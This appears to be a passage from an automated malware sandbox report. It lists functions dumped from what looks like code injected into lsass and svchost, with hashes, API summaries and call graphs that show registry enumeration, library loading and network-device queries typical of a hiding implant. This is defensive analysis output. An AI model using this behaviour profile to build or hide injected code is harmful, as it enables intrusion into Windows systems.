                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D919E72708B5886F7609F69B8403ED2BB0AB45B88F1C4109DE9E67696DB39C4C7C780
                                                                                                                                                                                                                                                Function 0000017D2DD57970 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction ID: 56d9c89a1354456b4152e3feaf7ab4f0009d3f5e52029d1d69d57cfdd1f396b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36112A36754F498AEB00CF60F8543E833B4FB19758F481E21DA6D867A9DF78C19A8380
                                                                                                                                                                                                                                                Function 0000017D2DD27980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 3242871069-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 64b258b276856c4315ce3074e58dc2a266c35d06194470ae3c2093080b27b4e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C51B132719B08AADB74CB15F448BA973B1FB44B98F188121EA5E4778FD778D982C700
                                                                                                                                                                                                                                                Function 0000017D2DD2A3C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3163161869-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: d996bef003f02a363a34af5b0532b5cc1378eca6726f4d65e603343d0348d5b5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53615972508FC885EB608B15F4443DAB7B4FB89B94F085215EB9D47B9ADB38C1D6CB00
                                                                                                                                                                                                                                                Function 0000017D2DD52338 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction ID: cf1a959bab5dd1f4c0482c38ebf77f020251721e11ee56a50850cedb394e5fe8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD51F93220CF8981E625DE29B4543EE6BB5FB95744F8C8115DE9E03B9BCA79C4CB8740
                                                                                                                                                                                                                                                Function 0000017D2DD62C60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction ID: 73a416b5944e276f2573bbea5e48b6f2d5f89e4f55dffa26d4c7022a4584330a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F41A472719F8486DB209F25F8443D967B0FB98784F498121EE4D87799EB7CC482CB80
                                                                                                                                                                                                                                                Function 0000017D2DD58A58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction ID: 532e8c491c2937e0962773f4e85e25c644e83c9141cc0e3b256ca70433223cfe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73112B36219F8482EB618F25F44029977F4FB88B94F5C4224EB8D07765EF7DC5928B40
                                                                                                                                                                                                                                                Function 0000017D2DD51BFC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: 68e8b1febf842112ef1852bde589c052e9c51d18d31615125d5cae841ebc14e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC113A35606F8881EA54DB66B8042A9B7B1FF89FC0F1D4068DE4D97766DE79D4838380
                                                                                                                                                                                                                                                Function 0000017D2DD51268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: f1bcd8aa1abc8590651bf66f0bbd1f21628ae84c1cd742650bcaa24afb1b9de1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE03939641B4886EB048B62F80838A36F1EB89B06F0880248A0947352DF7D84DAC7D0

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:0.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:74
                                                                                                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                                                                                                execution_graph 15696 22f4b921ac4 15701 22f4b921630 GetProcessHeap 15696->15701 15698 22f4b921ada Sleep SleepEx 15699 22f4b921ad3 15698->15699 15699->15698 15700 22f4b9215a0 StrCmpIW StrCmpW 15699->15700 15700->15699 15702 22f4b921650 __free_lconv_num 15701->15702 15746 22f4b921268 GetProcessHeap 15702->15746 15704 22f4b921658 15705 22f4b921268 2 API calls 15704->15705 15706 22f4b921669 15705->15706 15707 22f4b921268 2 API calls 15706->15707 15708 22f4b921672 15707->15708 15709 22f4b921268 2 API calls 15708->15709 15710 22f4b92167b 15709->15710 15711 22f4b921696 RegOpenKeyExW 15710->15711 15712 22f4b9216c8 RegOpenKeyExW 15711->15712 15713 22f4b9218ae 15711->15713 15714 22f4b9216f1 15712->15714 15715 22f4b921707 RegOpenKeyExW 15712->15715 15713->15699 15750 22f4b9212bc RegQueryInfoKeyW 15714->15750 15717 22f4b921742 RegOpenKeyExW 15715->15717 15718 22f4b92172b 15715->15718 15721 22f4b921766 15717->15721 15722 22f4b92177d RegOpenKeyExW 15717->15722 15761 22f4b92104c RegQueryInfoKeyW 15718->15761 15724 22f4b9212bc 13 API calls 15721->15724 15725 22f4b9217a1 15722->15725 15726 22f4b9217b8 RegOpenKeyExW 15722->15726 15729 22f4b921773 RegCloseKey 15724->15729 15730 22f4b9212bc 13 API calls 15725->15730 15727 22f4b9217f3 RegOpenKeyExW 15726->15727 15728 22f4b9217dc 15726->15728 15732 22f4b921817 15727->15732 15733 22f4b92182e RegOpenKeyExW 15727->15733 15731 22f4b9212bc 13 API calls 15728->15731 15729->15722 15734 22f4b9217ae RegCloseKey 15730->15734 15735 22f4b9217e9 RegCloseKey 15731->15735 15736 22f4b92104c 5 API calls 15732->15736 15737 22f4b921852 15733->15737 15738 22f4b921869 RegOpenKeyExW 15733->15738 15734->15726 15735->15727 15739 22f4b921824 RegCloseKey 15736->15739 15740 22f4b92104c 5 API calls 15737->15740 15741 22f4b9218a4 RegCloseKey 15738->15741 15742 22f4b92188d 15738->15742 15739->15733 15743 22f4b92185f RegCloseKey 15740->15743 15741->15713 15744 22f4b92104c 5 API calls 15742->15744 15743->15738 15745 22f4b92189a RegCloseKey 15744->15745 15745->15741 15767 22f4b936168 15746->15767 15748 22f4b921283 GetProcessHeap 15749 22f4b9212ae __free_lconv_num 15748->15749 15749->15704 15751 22f4b92148a RegCloseKey 15750->15751 15752 22f4b921327 GetProcessHeap 15750->15752 15751->15715 15753 22f4b92133e __free_lconv_num 15752->15753 15754 22f4b921352 RegEnumValueW 15753->15754 15755 22f4b921476 GetProcessHeap HeapFree 15753->15755 15757 22f4b9213d3 GetProcessHeap 15753->15757 15758 22f4b92141e lstrlenW GetProcessHeap 15753->15758 15759 22f4b9213f3 GetProcessHeap HeapFree 15753->15759 15760 22f4b921443 StrCpyW 15753->15760 15769 22f4b921534 15753->15769 15754->15753 15755->15751 15757->15753 15758->15753 15759->15758 15760->15753 15762 22f4b9210bf __free_lconv_num 15761->15762 15763 22f4b9211b5 RegCloseKey 15761->15763 15762->15763 15764 22f4b9210cf RegEnumValueW 15762->15764 15765 22f4b92114e GetProcessHeap 15762->15765 15766 22f4b92116e GetProcessHeap HeapFree 15762->15766 15763->15717 15764->15762 15765->15762 15766->15762 15768 22f4b936177 15767->15768 15770 22f4b921584 15769->15770 15771 22f4b92154e 15769->15771 15770->15753 15771->15770 15772 22f4b921565 StrCmpIW 15771->15772 15773 22f4b92156d StrCmpW 15771->15773 15772->15771 15773->15771 15774 22f4b8f2750 15776 22f4b8f277e 15774->15776 15775 22f4b8f286c LoadLibraryA 15775->15776 15776->15775 15777 22f4b8f28e8 15776->15777

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 0000022F4B9232A0 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1683269324-0
                                                                                                                                                                                                                                                • Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction ID: d81be12686201a910b7a8ac82212fa99a14c3db81ea8597e4b677e2590b7596c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E115E28E18641AAFBD8BFE1EB2D35B23B4A794705F404435974646193DFBCC148C211
                                                                                                                                                                                                                                                Function 0000022F4B921AC4 Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: GetProcessHeap.KERNEL32 ref: 0000022F4B92163B
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: HeapAlloc.KERNEL32 ref: 0000022F4B92164A
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9216BA
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9216E7
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B921701
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921721
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B92173C
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92175C
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B921777
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921797
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B9217B2
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 0000022F4B921ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 0000022F4B921AE5
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B9217ED
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92180D
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B921828
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921848
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B921863
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921883
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B92189E
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B9218A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: 9c87387f8f48b234e737faba1eb93da8d1be4e29d7256ac226bb75817f586ff6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA31CF6DE10615A1FBD8BFF2D76827B23B4AB44BC0F1458315F098769BEE98C4B1C250
                                                                                                                                                                                                                                                Function 0000022F4B8F2750 Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction ID: bb5512ff0dbf2d6757295d58d983556dc14fa88658f0bb5d8736df877bd06eb8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A61153AF0169497DF949F95D204F6AB3A2F744B95F588130EF190778AEA78D823C700
                                                                                                                                                                                                                                                Function 0000022F4B923858 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 104 22f4b923858-22f4b923863 105 22f4b923865-22f4b923878 StrCmpNIW 104->105 106 22f4b92387d-22f4b923884 104->106 105->106 107 22f4b92387a 105->107 107->106
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0bcdd8bc399243b85fdbdeadd6d3938df9384e511b8271d9569c855e29d0cd8c
                                                                                                                                                                                                                                                • Instruction ID: a66383d20355286b729e5a719099632fc3136ca55460e893d02ffc0528a6567d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bcdd8bc399243b85fdbdeadd6d3938df9384e511b8271d9569c855e29d0cd8c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79D05E2CF15205AAFB98EFE5C9E96622371DB08744F885032CB0046241EBA9C98EDB10

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 0000022F4B922B40 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 290 22f4b922b40-22f4b922bb9 call 22f4b942d50 293 22f4b922bbf-22f4b922bc5 290->293 294 22f4b922ef4-22f4b922f17 290->294 293->294 295 22f4b922bcb-22f4b922bce 293->295 295->294 296 22f4b922bd4-22f4b922bd7 295->296 296->294 297 22f4b922bdd-22f4b922bed GetModuleHandleA 296->297 298 22f4b922c01 297->298 299 22f4b922bef-22f4b922bff call 22f4b936090 297->299 301 22f4b922c04-22f4b922c22 298->301 299->301 301->294 304 22f4b922c28-22f4b922c47 StrCmpNIW 301->304 304->294 305 22f4b922c4d-22f4b922c51 304->305 305->294 306 22f4b922c57-22f4b922c61 305->306 306->294 307 22f4b922c67-22f4b922c6e 306->307 307->294 308 22f4b922c74-22f4b922c87 307->308 309 22f4b922c89-22f4b922c95 308->309 310 22f4b922c97 308->310 311 22f4b922c9a-22f4b922c9e 309->311 310->311 312 22f4b922ca0-22f4b922cac 311->312 313 22f4b922cae 311->313 314 22f4b922cb1-22f4b922cbb 312->314 313->314 315 22f4b922db1-22f4b922db5 314->315 316 22f4b922cc1-22f4b922cc4 314->316 317 22f4b922ee6-22f4b922eee 315->317 318 22f4b922dbb-22f4b922dbe 315->318 319 22f4b922cd6-22f4b922ce0 316->319 320 22f4b922cc6-22f4b922cd3 call 22f4b9219a4 316->320 317->294 317->308 321 22f4b922dcf-22f4b922dd9 318->321 322 22f4b922dc0-22f4b922dcc call 22f4b9219a4 318->322 324 22f4b922ce2-22f4b922cef 319->324 325 22f4b922d14-22f4b922d1e 319->325 320->319 327 22f4b922e09-22f4b922e0c 321->327 328 22f4b922ddb-22f4b922de8 321->328 322->321 324->325 330 22f4b922cf1-22f4b922cfe 324->330 331 22f4b922d20-22f4b922d2d 325->331 332 22f4b922d4e-22f4b922d51 325->332 338 22f4b922e19-22f4b922e26 lstrlenW 327->338 339 22f4b922e0e-22f4b922e17 call 22f4b921bc4 327->339 328->327 337 22f4b922dea-22f4b922df7 328->337 340 22f4b922d01-22f4b922d07 330->340 331->332 333 22f4b922d2f-22f4b922d3c 331->333 335 22f4b922d5f-22f4b922d6c lstrlenW 332->335 336 22f4b922d53-22f4b922d5d call 22f4b921bc4 332->336 341 22f4b922d3f-22f4b922d45 333->341 343 22f4b922d8f-22f4b922da1 call 22f4b923858 335->343 344 22f4b922d6e-22f4b922d78 335->344 336->335 347 22f4b922da7-22f4b922dac 336->347 345 22f4b922dfa-22f4b922e00 337->345 349 22f4b922e49-22f4b922e53 call 22f4b923858 338->349 350 22f4b922e28-22f4b922e32 338->350 339->338 358 22f4b922e5e-22f4b922e69 339->358 340->347 348 22f4b922d0d-22f4b922d12 340->348 341->347 353 22f4b922d47-22f4b922d4c 341->353 343->347 351 22f4b922e56-22f4b922e58 343->351 344->343 356 22f4b922d7a-22f4b922d8d call 22f4b921534 344->356 357 22f4b922e02-22f4b922e07 345->357 345->358 347->351 348->325 348->340 349->351 350->349 352 22f4b922e34-22f4b922e47 call 22f4b921534 350->352 351->317 351->358 352->349 352->358 353->332 353->341 356->343 356->347 357->327 357->345 363 22f4b922ee0-22f4b922ee4 358->363 364 22f4b922e6b-22f4b922e6f 358->364 363->317 368 22f4b922e71-22f4b922e75 364->368 369 22f4b922e77-22f4b922e91 call 22f4b935090 364->369 368->369 371 22f4b922e94-22f4b922e97 368->371 369->371 374 22f4b922e99-22f4b922eb7 call 22f4b935090 371->374 375 22f4b922eba-22f4b922ebd 371->375 374->375 375->363 376 22f4b922ebf-22f4b922edd call 22f4b935090 375->376 376->363
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 2119608203-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: 51cb9ab855fb66ec8be5d2d1826b638288ed67a0bdea995acf2a15a3ab2e5b50
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AB1AF3AE10690A1FF9CAFA5D6287AA77B4FB44B84F045836DF0953796DAB8CC44C340
                                                                                                                                                                                                                                                Function 0000022F4B927D90 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
